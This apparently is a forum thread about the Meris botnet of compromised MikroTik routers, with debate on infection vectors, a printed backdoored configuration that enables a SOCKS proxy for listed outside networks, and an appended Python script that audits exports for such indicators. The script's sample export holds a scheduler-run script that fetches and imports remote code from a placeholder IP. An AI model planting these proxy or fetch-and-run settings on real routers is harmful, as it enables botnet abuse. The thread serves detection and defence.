200k Mikrotik devices involved in DDoS botnet

Looks like there is a new DDoS botnet on the loose, comprised of Mikrotik devices.

We do not know precisely what particular vulnerabilities led to the situation where Mikrotik devices are being compromised on such a large scale. Several records at the Mikrotik forum indicate that its customers experienced hacking attempts on older versions of RouterOS, particularly 6.40.1 from 2017. If this is correct and we see that old vulnerability still being active on thousands of devices being unpatched and unupgraded, this is horrible news. However, our data with Yandex indicates that this is not true – because the spectrum of RouterOS versions we see across this botnet varies from years old to recent. The largest share belongs to the version of firmware previous to the current Stable one.

https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/

This is scary - how are devices running 6.48.3 being infected? If there was a weak admin password and no firewall I could understand them being compromised, but the attacker should still be limited to boring things like running proxies and VPNs and whatever other functions exist in RouterOS. A scripted fetch attack also wouldn’t generate such high levels of traffic, the fact that they can be used for a DDoS with a HTTP pipelining attack implies that the device has been rooted to run arbitrary code which shouldn’t be possible with modern RouterOS versions. Is there a new exploit going around?

One simple thing: NAT

If one internal non-MikroTik device is infected, this appears to come from the router…
In how many % of the cases is the router not involved at all???

Perhaps related to the recent blocking of the MT cloud service??

Maybe they were infected earlier, and just upgraded without netinstall?

What are the signs that the device is infected?
For example: the presence of extraneous scripts, the presence of a new user who was recently created, or something else?

Usually Socks open, and a script on the scheduler, some downloaded files on the fly or undeletable files, VPN, etc.

The instances I have seen are from poor password and update policies as well as not limiting management access to the routers. Some had old RouterOS versions that were exploited and the user/pass was obtained and used on other Mikrotik routers that were running newer versions but utilizing the same user/pass.

Example of one that was compromised:
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=178.63.52.200/29
add src-address=136.243.90.80/29
add src-address=136.243.21.232/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=192.243.55.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add src-address=5.188.119.191
add src-address=178.63.52.202
add src-address=136.243.21.233
add src-address=136.243.90.81
add src-address=94.130.223.9
add action=deny src-address=0.0.0.0/0

Ah, so the hackers use socks, that’s why it’s still in RouterOS.

Perhaps future RouterOS versions should separate socks into a separate package. I mean, in the thousands of Mikrotiks that I have logged into, the only time I have seen it being used was on routers that were previously hacked.

Check for scripts, schedulers, and if IP socks was used.

What worries me is that they all seem to have port 2000 open (Bandwidth Test Server), that could be either an infection vector (vulnerability in implementation) or because of a lacking default firewall (btest server is running by default).
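One way to check a router for the indicators named in this thread (SOCKS enabled and its access list, scheduler entries, scripts that fetch or import something, users nobody created on purpose, and the bandwidth-test server on port 2000) is to audit the plain text that `/export` prints. The script below is an added example, not code from the thread or from MikroTik; the export it parses is a constructed sample in the style of the one posted above, with addresses taken from the RFC 5737 documentation ranges instead of the real ones, and the `expected_users` list is an assumption you would replace with your own accounts.

```python
import sys
import shlex
from collections import defaultdict

# Constructed sample export (not from a real device); addresses are RFC 5737 documentation ranges.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=203.0.113.0/24
add src-address=198.51.100.7
add action=deny src-address=0.0.0.0/0
/system scheduler
add interval=10m name=upd on-event=upd policy=read,write,policy,test start-time=startup
/system script
add name=upd policy=read,write,policy,test source="/tool fetch url=\\"http://198.51.100.7/x.rsc\\" mode=http;/import x.rsc"
/user
add name=service group=full
/tool bandwidth-server
set enabled=yes authenticate=no
"""


def parse_export(text):
    """Parse RouterOS /export text into {section_path: [entry, ...]}.

    A line starting with '/' selects the section; following 'add'/'set' lines
    carry key=value pairs. shlex handles quoted values such as source="...".
    """
    sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            continue
        if current is None:
            continue
        tokens = shlex.split(line)
        entry = {"_verb": tokens[0]}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                entry[key] = value
        sections[current].append(entry)
    return sections


def audit(sections, expected_users=("admin",)):
    """Return a list of human-readable findings for the indicators discussed in the thread."""
    findings = []
    # SOCKS proxy switched on: the most consistent sign reported above.
    for entry in sections.get("/ip socks", []):
        if entry.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {entry.get('port', '1080')}")
    # Any allow entry in the SOCKS access list means someone is meant to use it.
    allowed = [e for e in sections.get("/ip socks access", []) if e.get("action", "allow") == "allow"]
    if allowed:
        findings.append(f"SOCKS access list allows {len(allowed)} source(s), e.g. {allowed[0].get('src-address')}")
    # Scheduler entries keep a foothold alive across reboots.
    for entry in sections.get("/system scheduler", []):
        findings.append(f"scheduler '{entry.get('name')}' runs '{entry.get('on-event')}' every {entry.get('interval')}")
    # Scripts that fetch or import are the usual re-download mechanism.
    for entry in sections.get("/system script", []):
        source = entry.get("source", "")
        if "fetch" in source or "import" in source:
            findings.append(f"script '{entry.get('name')}' fetches/imports: {source[:60]}")
    # Accounts outside the expected set (assumed list; adjust to your router).
    for entry in sections.get("/user", []):
        if entry.get("name") not in expected_users:
            findings.append(f"unexpected user '{entry.get('name')}' in group '{entry.get('group')}'")
    # Bandwidth-test server listens on TCP 2000 when enabled.
    for entry in sections.get("/tool bandwidth-server", []):
        if entry.get("enabled") == "yes":
            findings.append("bandwidth-test server (TCP 2000) enabled")
    return findings


if __name__ == "__main__":
    # Usage: python audit_export.py export.rsc   (file saved from '/export' on the router)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORT
    for finding in audit(parse_export(text)):
        print("FINDING:", finding)
```

Save the output of `/export` to a file (for example over SSH with `ssh admin@router /export > export.rsc`) and run the script against it; on the constructed sample it reports all six indicators. The script only reads the export, so it is safe to run on every router in a fleet before deciding which ones need a netinstall.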